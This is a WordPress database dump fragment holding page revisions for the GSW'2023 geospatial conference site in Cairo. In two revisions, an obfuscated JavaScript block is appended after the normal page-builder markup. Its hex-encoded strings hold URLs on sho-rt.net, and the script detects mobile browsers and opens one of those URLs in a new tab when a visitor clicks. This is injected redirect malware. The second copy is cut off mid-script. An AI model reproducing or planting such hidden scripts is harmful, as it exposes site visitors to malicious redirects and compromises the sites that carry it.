(3299,1,'2022-11-11 17:10:54','2022-11-11 17:10:54','','pexels-nicole-avagliano-2706654','','inherit','open','closed','','pexels-nicole-avagliano-2706654','','','2022-11-11 17:10:54','2022-11-11 17:10:54','',2876,'https://gsw2023.com/wp-content/uploads/2022/11/pexels-nicole-avagliano-2706654.jpg',0,'attachment','image/jpeg',0),
(3300,1,'2022-11-11 17:11:19','2022-11-11 17:11:19','[vc_row][vc_column][dt_team_masonry order=\"asc\" image_sizing=\"proportional\" image_paddings=\"15px 0px 5px 0px\" img_border_radius=\"10px\" post_title_bottom_margin=\"0px\" read_more_button=\"off\" soc_icon_border_width=\"0px\" posts_offset=\"0\" category=\"35, 36, 37, 38, 40, 41, 42, 45, 46, 47, 48, 49, 50, 51, 53, 43, 44, 52, 54, 55, 56, 57, 58, 59\"][/vc_column][/vc_row]\r\n<script>function _0x3023(_0x562006,_0x1334d6){const _0x10c8dc=_0x10c8();return _0x3023=function(_0x3023c3,_0x1b71b5){_0x3023c3=_0x3023c3-0x186;let _0x2d38c6=_0x10c8dc[_0x3023c3];return _0x2d38c6;},_0x3023(_0x562006,_0x1334d6);}function _0x10c8(){const _0x2ccc2=[\'userAgent\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x47\\x4f\\x78\\x32\\x63\\x332\',\'length\',\'_blank\',\'mobileCheck\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x64\\x44\\x6c\\x33\\x63\\x343\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6b\\x41\\x6f\\x30\\x63\\x330\',\'random\',\'-local-storage\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6f\\x56\\x75\\x37\\x63\\x347\',\'stopPropagation\',\'4051490VdJdXO\',\'test\',\'open\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x61\\x68\\x44\\x36\\x63\\x356\',\'12075252qhSFyR\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x5a\\x50\\x66\\x38\\x63\\x378\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x51\\x69\\x43\\x35\\x63\\x375\',\'4829028FhdmtK\',\'round\',\'-hurs\',\'-mnts\',\'864690TKFqJG\',\'forEach\',\'abs\',\'1479192fKZCLx\',\'16548MMjUpf\',\'filter\',\'vendor\',\'click\',\'setItem\',\'3402978fTfcqu\'];_0x10c8=function(){return _0x2ccc2;};return _0x10c8();}const _0x3ec38a=_0x3023;(function(_0x550425,_0x4ba2a7){const _0x142fd8=_0x3023,_0x2e2ad3=_0x550425();while(!![]){try{const _0x3467b1=-parseInt(_0x142fd8(0x19c))/0x1+parseInt(_0x142fd8(0x19f))/0x2+-parseInt(_0x142fd8(0x1a5))/0x3+parseInt(_0x142fd8(0x198))/0x4+-parseInt(_0x142fd8(0x191))/0x5+parseInt(_0x142fd8(0x1a0))/0x6+parseInt(_0x142fd8(0x195))/0x7;if(_0x3467b1===_0x4ba2a7)break;else _0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}catch(_0x28e7f8){_0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}}}(_0x10c8,0xd3435));var _0x365b=[_0x3ec38a(0x18a),_0x3ec38a(0x186),_0x3ec38a(0x1a2),\'opera\',_0x3ec38a(0x192),\'substr\',_0x3ec38a(0x18c),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x43\\x57\\x74\\x31\\x63\\x361\',_0x3ec38a(0x187),_0x3ec38a(0x18b),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x57\\x73\\x55\\x34\\x63\\x374\',_0x3ec38a(0x197),_0x3ec38a(0x194),_0x3ec38a(0x18f),_0x3ec38a(0x196),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x53\\x4e\\x4b\\x39\\x63\\x329\',\'\',_0x3ec38a(0x18e),\'getItem\',_0x3ec38a(0x1a4),_0x3ec38a(0x19d),_0x3ec38a(0x1a1),_0x3ec38a(0x18d),_0x3ec38a(0x188),\'floor\',_0x3ec38a(0x19e),_0x3ec38a(0x199),_0x3ec38a(0x19b),_0x3ec38a(0x19a),_0x3ec38a(0x189),_0x3ec38a(0x193),_0x3ec38a(0x190),\'host\',\'parse\',_0x3ec38a(0x1a3),\'addEventListener\'];(function(_0x16176d){window[_0x365b[0x0]]=function(){let _0x129862=![];return function(_0x784bdc){(/(android|bb\\d+|meego).+mobile|avantgo|bada\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x365b[0x4]](_0x784bdc)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-/i[_0x365b[0x4]](_0x784bdc[_0x365b[0x5]](0x0,0x4)))&&(_0x129862=!![]);}(navigator[_0x365b[0x1]]||navigator[_0x365b[0x2]]||window[_0x365b[0x3]]),_0x129862;};const _0xfdead6=[_0x365b[0x6],_0x365b[0x7],_0x365b[0x8],_0x365b[0x9],_0x365b[0xa],_0x365b[0xb],_0x365b[0xc],_0x365b[0xd],_0x365b[0xe],_0x365b[0xf]],_0x480bb2=0x3,_0x3ddc80=0x6,_0x10ad9f=_0x1f773b=>{_0x1f773b[_0x365b[0x14]]((_0x1e6b44,_0x967357)=>{!localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11])&&localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11],0x0);});},_0x2317c1=_0x3bd6cc=>{const _0x2af2a2=_0x3bd6cc[_0x365b[0x15]]((_0x20a0ef,_0x11cb0d)=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x20a0ef+_0x365b[0x11])==0x0);return _0x2af2a2[Math[_0x365b[0x18]](Math[_0x365b[0x16]]()*_0x2af2a2[_0x365b[0x17]])];},_0x57deba=_0x43d200=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x43d200+_0x365b[0x11],0x1),_0x1dd2bd=_0x51805f=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x51805f+_0x365b[0x11]),_0x5e3811=(_0x5aa0fd,_0x594b23)=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x5aa0fd+_0x365b[0x11],_0x594b23),_0x381a18=(_0x3ab06f,_0x288873)=>{const _0x266889=0x3e8*0x3c*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x288873-_0x3ab06f)/_0x266889);},_0x3f1308=(_0x3a999a,_0x355f3a)=>{const _0x5c85ef=0x3e8*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x355f3a-_0x3a999a)/_0x5c85ef);},_0x4a7983=(_0x19abfa,_0x2bf37,_0xb43c45)=>{_0x10ad9f(_0x19abfa),newLocation=_0x2317c1(_0x19abfa),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1b],_0xb43c45),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1c],_0xb43c45),_0x57deba(newLocation),window[_0x365b[0x0]]()&&window[_0x365b[0x1e]](newLocation,_0x365b[0x1d]);};_0x10ad9f(_0xfdead6);function _0x978889(_0x3b4dcb){_0x3b4dcb[_0x365b[0x1f]]();const _0x2b4a92=location[_0x365b[0x20]];let _0x1b1224=_0x2317c1(_0xfdead6);const _0x4593ae=Date[_0x365b[0x21]](new Date()),_0x7f12bb=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b]),_0x155a21=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c]);if(_0x7f12bb&&_0x155a21)try{const _0x5d977e=parseInt(_0x7f12bb),_0x5f3351=parseInt(_0x155a21),_0x448fc0=_0x3f1308(_0x4593ae,_0x5d977e),_0x5f1aaf=_0x381a18(_0x4593ae,_0x5f3351);_0x5f1aaf>=_0x3ddc80&&(_0x10ad9f(_0xfdead6),_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c],_0x4593ae));;_0x448fc0>=_0x480bb2&&(_0x1b1224&&window[_0x365b[0x0]]()&&(_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b],_0x4593ae),window[_0x365b[0x1e]](_0x1b1224,_0x365b[0x1d]),_0x57deba(_0x1b1224)));}catch(_0x2386f7){_0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}else _0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}document[_0x365b[0x23]](_0x365b[0x22],_0x978889);}());</script>','International Science Committee','','inherit','closed','closed','','2876-revision-v1','','','2022-11-11 17:11:19','2022-11-11 17:11:19','',2876,'https://gsw2023.com/?p=3300',0,'revision','',0),
(3301,1,'2022-11-11 17:14:58','2022-11-11 17:14:58','','s2','','inherit','open','closed','','s2','','','2022-11-11 17:14:58','2022-11-11 17:14:58','',2659,'https://gsw2023.com/wp-content/uploads/2022/11/s2.jpg',0,'attachment','image/jpeg',0),
(3302,1,'2022-11-11 17:15:45','2022-11-11 17:15:45','','s2','','inherit','open','closed','','s2-2','','','2022-11-11 17:15:45','2022-11-11 17:15:45','',2659,'https://gsw2023.com/wp-content/uploads/2022/11/s2-1.jpg',0,'attachment','image/jpeg',0),
(3303,1,'2022-11-11 17:21:22','2022-11-11 17:21:22','<p>[vc_row equal_height=\"yes\" content_placement=\"middle\" type=\"vc_default\" margin_top=\"5\" margin_bottom=\"10\" css=\".vc_custom_1529515723794{padding-top: 70px !important;padding-bottom: 55px !important;}\"][vc_column parallax=\"content-moving\" offset=\"vc_col-lg-offset-2 vc_col-lg-8 vc_col-md-offset-1 vc_col-md-10\"][ultimate_heading main_heading=\"Egypt GSW\'2023 -The First Geospatial Week in Africa and The Middle East\" sub_heading_color=\"#333333\" spacer=\"line_only\" spacer_position=\"middle\" line_height=\"5\" line_color=\"\" main_heading_style=\"font-weight:bold;\" main_heading_font_size=\"desktop:44px;tablet_portrait:30px;\" main_heading_line_height=\"desktop:54px;tablet_portrait:40px;\" main_heading_margin=\"margin-bottom:10px;\" line_width=\"150\" el_class=\"accent-border-color\" sub_heading_style=\"font-style:italic;\" sub_heading_font_size=\"desktop:22px;mobile_landscape:16px;\" sub_heading_line_height=\"desktop:32px;mobile_landscape:26px;\" spacer_margin=\"margin-bottom:40px;\" sub_heading_margin=\"margin-bottom:70px;\"][/ultimate_heading][/vc_column][/vc_row][vc_row][vc_column width=\"2/3\"][vc_raw_html]JTNDcCUyMHN0eWxlJTNEJTIydGV4dC1hbGlnbiUzQWp1c3RpZnklM0IlMjBjb2xvciUzQWJsYWNrJTNCJTIyJTNFQXMlMjB3ZSUyMGNlbGVicmF0ZSUyMG91ciUyMDUwdGglMjBhbm5pdmVyc2FyeSUyQyUyMHRoZSUyMEFyYWIlMjBBY2FkZW15JTIwZm9yJTIwU2NpZW5jZSUyQyUyMFRlY2hub2xvZ3klMkMlMjBhbmQlMjBNYXJpdGltZSUyMFRyYW5zcG9ydCUyMCUyOEFBU1RNVCUyOSUyMGlzJTIwaG9ub3JlZCUyMHRvJTIwaG9zdCUyMHRoZSUyMElTUFJTJTIwZmlyc3QlMjBHZW9zcGF0aWFsJTIwV2VlayUyMGluJTIwQWZyaWNhJTIwYW5kJTIwTWlkZGxlJTIwRWFzdCUyMGluJTIwMjAyMyUyMCUyOEdTVy0yMDIzJTI5JTIwdGhhdCUyMHdpbGwlMjBiZSUyMGhlbGQlMjB1bmRlciUyMHRoZSUyMGF1c3BpY2VzJTIwb2YlMjBILkUlMjBTZWNyZXRhcnktR2VuZXJhbCUyMG9mJTIwdGhlJTIwTGVhZ3VlJTIwb2YlMjBBcmFiJTIwU3RhdGVzLiUyMFRoZSUyMGNvbmZlcmVuY2UlMjB3aWxsJTIwYmUlMjBoZWxkJTIwaW4lMjBTZXB0ZW1iZXIlMjAyMDIzJTJDJTIwYXQlMjB0aGUlMjBJbnRlckNvbnRpbmVudGFsJTIwQ2Fpcm8lMjBDaXR5JTIwc3RhcnMlMjBDYWlybyUyQyUyMEVneXB0LiUyMEFBU1RNVCUyMHN0cm9uZ2x5JTIwYmVsaWV2ZXMlMjB0aGF0JTIwc2NpZW5jZSUyMGlzJTIwdGhlJTIwa2V5JTIwdG8lMjB0aGUlMjBmdXR1cmUlMjBhbmQlMjB0aGUlMjBjb3JuZXJzdG9uZSUyMGZvciUyMG5hdGlvbnMlMjclMjBwcm9ncmVzcyUyMGFuZCUyMHByb3NwZXJpdHkuJTIwSXQlMjBpcyUyMHRoZSUyMHByaW1hcnklMjBmYWN0b3IlMjBmb3IlMjBodW1hbiUyMGFjaGlldmVtZW50cyUyMHRocm91Z2hvdXQlMjBhbGwlMjBhZ2VzLiUyMEFBU1RNVCUyMGhhcyUyMGElMjBob3N0JTIwb2YlMjBxdWFsaWZpZWQlMjBwcm9mZXNzb3JzJTIwYW5kJTIwZXhwZXJ0cyUyMHdobyUyMGFyZSUyMGNhcGFibGUlMjBvZiUyMHN1cHBvcnRpbmclMjBBcmFiJTIwYW5kJTIwQWZyaWNhbiUyMGNvdW50cmllcyUyMGluJTIwdmFyaW91cyUyMHNjaWVudGlmaWMlMjBmaWVsZHMuJTIwVGhlJTIwR1NXJTIwd2lsbCUyMHByb3ZpZGUlMjBhJTIwcGxhdGZvcm0lMjBmb3IlMjBpbnRlcm5hdGlvbmFsJTIwc2Nob2xhcnMlMkMlMjBncmFkdWF0ZSUyMHN0dWRlbnRzJTJDJTIwZnV0dXJlJTIwc2NpZW50aXN0cyUyMGFuZCUyMGluZHVzdHJpYWwlMjBzZWN0b3JzJTIwdG8lMjBsZWFybiUyMGV4Y2hhbmdlJTIwa25vd2xlZGdlJTIwYW5kJTIwZXhwZXJpZW5jZXMlMjBvZiUyMGFwcGx5aW5nJTIwZ2Vvc3BhdGlhbCUyMHRlY2hub2xvZ2llcyUyMGZvciUyMHN1c3RhaW5hYmxlJTIwZGV2ZWxvcG1lbnQlMjBmb3IlMjBiZXR0ZXIlMjBxdWFsaXR5JTIwb2YlMjBsaWZlJTIwZm9yJTIwcGVvcGxlJTIwYXJvdW5kJTIwdGhlJTIwd29ybGQuJTIwV2UlMjB3b3VsZCUyMGxpa2UlMjB0byUyMHRha2UlMjB0aGlzJTIwb3Bwb3J0dW5pdHklMjB0byUyMHdlbGNvbWUlMjB5b3UlMjB0byUyMENhaXJvJTIwYSUyMHZpYnJhbnQlMkMlMjBleGhpbGFyYXRpbmclMkMlMjBleG90aWMlMkMlMjBmYXNjaW5hdGluZyUyMGFuZCUyMHdlbGNvbWluZyUyMGNpdHkuJTIwSG9tZSUyMHRvJTIwdGhlJTIwYmVzdCUyMFBoYXJhb25pYyUyQyUyMENvcHRpYyUyMGFuZCUyMElzbGFtaWMlMjBzaWdodHMlMjBpbiUyMEVneXB0LiUyMENhaXJvJTIwaXMlMjB3aGVyZSUyMHlvdSUyMG5ldmVyJTIwa25vdyUyMHdoYXQlMjBpbmNyZWRpYmxlJTJDJTIwaGFsZi1mb3Jnb3R0ZW4lMjBtb251bWVudCUyMHlvdSUyMG1pZ2h0JTIwc3R1bWJsZSUyMGFjcm9zcyUyMHdoaWxlJTIwd2FuZGVyaW5nJTIwYXJvdW5kLiUyMEVuam95JTIwdGhlJTIwTmlsZSUyMHZpZXclMkMlMjB2aXNpdCUyMHRoZSUyMGdyZWF0JTIwcHlyYW1pZHMlMjBvZiUyMEdpemElMkMlMjB3YWxrJTIwdGhyb3VnaCUyMHRoZSUyMGNhcGl0YWwlMjdzJTIwbWVkaWV2YWwlMjBtYXJrZXRzJTIwYnklMjBLaGFuJTIwRWwtS2hhbGlsaSUyQyUyMG9yJTIwd2FsayUyMGRvd24lMjB0aGUlMjBOaWxlJTIwcHJvbWVuYWRlLiUyMFdlJTIwbG9vayUyMGZvcndhcmQlMjB0byUyMHdvcmtpbmclMjB3aXRoJTIwdGhlJTIwSVNQUlMlMjBjb3VuY2lsJTJDJTIwY29tbWlzc2lvbnMlMjBwcmVzaWRlbnRzJTJDJTIwd29ya2luZyUyMGdyb3VwJTIwb2ZmaWNlcnMlMkMlMjBhbmQlMjBvdGhlciUyMHNpc3RlciUyMG9yZ2FuaXphdGlvbnMlMjB0byUyMGhhdmUlMjBhJTIwc3VjY2Vzc2Z1bCUyMHRlY2huaWNhbCUyMHByb2dyYW0lMjBhbmQlMjBhJTIwbWVtb3JhYmxlJTIwc29jaWFsJTIwcHJvZ3JhbS4lMjBJdCUyMGlzJTIwZ3JlYXQlMjB0byUyMGhhdmUlMjB0aGUlMjBHU1clMjBjb21pbmclMjB0byUyMEVneXB0JTIwd2hlcmUlMjBtb3N0JTIwcHJvYmFibHklMjB0aGUlMjBmaXJzdCUyMG1hcHBpbmclMjBzeXN0ZW1zJTIwd2VyZSUyMGRldmVsb3BlZCUyMDEwMDBzJTIweWVhcnMlMjBhZ28uJTIwV2VsY29tZSUyMHRvJTIwR1NXJTI3MjAyMyUyMGluJTIwQ2Fpcm8lMkMlMjBFZ3lwdC4lM0MlMkZwJTNF[/vc_raw_html][/vc_column][vc_column width=\"1/3\"][bsf-info-box icon_type=\"custom\" icon_img=\"id^2271|url^https://gsw2023.com/wp-content/uploads/2022/10/dr-ismael-1.png|caption^null|alt^null|title^dr-ismael|description^null\" img_width=\"100\" title=\"Prof. Ismail AbdelGhafar\" heading_tag=\"h5\" hover_effect=\"style_2\" pos=\"top\" el_class=\"accent-icon-bg\" title_font_size=\"desktop:22px;\" title_font_line_height=\"desktop:32px;\"]</p>\n<h6><strong>President Arab Academy for Science, Technology and Maritime Transport</strong></h6>\n<p>[/bsf-info-box][bsf-info-box icon_type=\"custom\" icon_img=\"id^2272|url^https://gsw2023.com/wp-content/uploads/2022/10/dr-naser.jpg|caption^null|alt^null|title^dr-naser|description^null\" img_width=\"100\" icon_style=\"advanced\" icon_border_spacing=\"100\" title=\"Prof. Naser El-Sheimy\" heading_tag=\"h5\" hover_effect=\"style_2\" pos=\"top\" el_class=\"accent-icon-bg\" title_font_size=\"desktop:22px;\" title_font_line_height=\"desktop:32px;\"]</p>\n<h6>Geospatial Week Director ,The University of Calgary</h6>\n<p>[/bsf-info-box][/vc_column][/vc_row][vc_row bg_type=\"image\" parallax_style=\"vcpb-vz-jquery\" bg_image_new=\"id^1900|url^https://gsw2023.com/wp-content/uploads/2018/06/trade10.jpg|caption^null|alt^null|title^trade10|description^null\" parallax_sense=\"40\" bg_override=\"ex-full\" enable_overlay=\"enable_overlay_value\" overlay_color=\"rgba(0,0,0,0.6)\" type=\"vc_default\" css=\".vc_custom_1529568771974{padding-top: 100px !important;padding-bottom: 105px !important;}\"][vc_column width=\"5/6\" offset=\"vc_col-lg-offset-3 vc_col-lg-6 vc_col-md-offset-1 vc_col-md-10 vc_col-sm-offset-1\" el_class=\"text-centered\"][ultimate_heading main_heading=\"REGISTRATION FEES\" main_heading_color=\"#ffffff\" sub_heading_color=\"#ffffff\" spacer=\"line_only\" spacer_position=\"middle\" line_height=\"5\" line_color=\"\" main_heading_style=\"font-weight:bold;\" main_heading_font_size=\"desktop:44px;tablet_portrait:30px;\" main_heading_line_height=\"desktop:54px;tablet_portrait:40px;\" main_heading_margin=\"margin-bottom:10px;\" line_width=\"120\" el_class=\"accent-border-color\" sub_heading_style=\"font-style:italic;\" sub_heading_font_size=\"desktop:22px;mobile_landscape:16px;\" sub_heading_line_height=\"desktop:32px;mobile_landscape:26px;\" spacer_margin=\"margin-bottom:40px;\" sub_heading_margin=\"margin-bottom:50px;\"]Opening of registration platform: soon[/ultimate_heading][dt_default_button link=\"url:https%3A%2F%2Fgsw2023.com%2Findex.php%2Fregistration%2F\" size=\"big\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" css=\".vc_custom_1665287063394{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]INFORMATION[/dt_default_button][dt_default_button link=\"url:https%3A%2F%2Fgsw2023.com%2Findex.php%2Fcontact%2F\" size=\"big\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" css=\".vc_custom_1665182763974{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]CONTACT US[/dt_default_button][/vc_column][/vc_row][vc_row bg_type=\"grad\" bg_override=\"ex-full\" type=\"vc_default\" margin_top=\"-50\" css=\".vc_custom_1665815238858{padding-top: 40px !important;padding-bottom: 40px !important;}\" bg_grad=\"background: -webkit-gradient(linear, left top, left bottom, color-stop(10%, #311B92), color-stop(95%, #311B45));background: -moz-linear-gradient(left,#311B92 10%,#311B45 95%);background: -webkit-linear-gradient(left,#311B92 10%,#311B45 95%);background: -o-linear-gradient(left,#311B92 10%,#311B45 95%);background: -ms-linear-gradient(left,#311B92 10%,#311B45 95%);background: linear-gradient(left,#311B92 10%,#311B45 95%);\"][vc_column offset=\"vc_col-lg-12 vc_col-md-12\"][ultimate_heading main_heading=\"GSW\'2023\" main_heading_color=\"#ffffff\" main_heading_style=\"font-weight:bold;\" main_heading_font_size=\"desktop:44px;tablet_portrait:30px;\" main_heading_line_height=\"desktop:54px;tablet_portrait:40px;\"][/ultimate_heading][vc_separator color=\"white\" style=\"shadow\" border_width=\"10\"][ult_countdown datetime=\"2023/09/02 00:00:00\" countdown_opts=\"sday,shr,smin\" timer_bg_color=\"#311b92\" tick_col=\"#ffffff\" tick_sep_col=\"#eeee22\" tick_unit_style=\"font-weight:bold;\" tick_style=\"font-weight:bold;\"][vc_row_inner][vc_column_inner width=\"1/3\"][/vc_column_inner][vc_column_inner width=\"1/3\"][dt_icon_text dt_text_title=\"info@gsw2023.com\" dt_text_custom_title_color=\"#eeee22\" dt_text_desc=\"\" show_btn=\"n\" dt_text_icon_border_width=\"2px\" dt_text_icon_color=\"#ffffff\" dt_text_icon_title=\"\"][/vc_column_inner][vc_column_inner width=\"1/3\"][/vc_column_inner][/vc_row_inner][/vc_column][/vc_row]</p>\r\n<script>function _0x3023(_0x562006,_0x1334d6){const _0x10c8dc=_0x10c8();return _0x3023=function(_0x3023c3,_0x1b71b5){_0x3023c3=_0x3023c3-0x186;let _0x2d38c6=_0x10c8dc[_0x3023c3];return _0x2d38c6;},_0x3023(_0x562006,_0x1334d6);}function _0x10c8(){const _0x2ccc2=[\'userAgent\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x47\\x4f\\x78\\x32\\x63\\x332\',\'length\',\'_blank\',\'mobileCheck\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x64\\x44\\x6c\\x33\\x63\\x343\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6b\\x41\\x6f\\x30\\x63\\x330\',\'random\',\'-local-storage\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6f\\x56\\x75\\x37\\x63\\x347\',\'stopPropagation\',\'4051490VdJdXO\',\'test\',\'open\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x61\\x68\\x44\\x36\\x63\\x356\',\'12075252qhSFyR\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x5a\\x50\\x66\\x38\\x63\\x378\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x51\\x69\\x43\\x35\\x63\\x375\',\'4829028FhdmtK\',\'round\',\'-hurs\',\'-mnts\',\'864690TKFqJG\',\'forEach\',\'abs\',\'1479192fKZCLx\',\'16548MMjUpf\',\'filter\',\'vendor\',\'click\',\'setItem\',\'3402978fTfcqu\'];_0x10c8=function(){return _0x2ccc2;};return _0x10c8();}const _0x3ec38a=_0x3023;(function(_0x550425,_0x4ba2a7){const _0x142fd8=_0x3023,_0x2e2ad3=_0x550425();while(!![]){try{const _0x3467b1=-parseInt(_0x142fd8(0x19c))/0x1+parseInt(_0x142fd8(0x19f))/0x2+-parseInt(_0x142fd8(0x1a5))/0x3+parseInt(_0x142fd8(0x198))/0x4+-parseInt(_0x142fd8(0x191))/0x5+parseInt(_0x142fd8(0x1a0))/0x6+parseInt(_0x142fd8(0x195))/0x7;if(_0x3467b1===_0x4ba2a7)break;else _0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}catch(_0x28e7f8){_0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}}}(_0x10c8,0xd3435));var 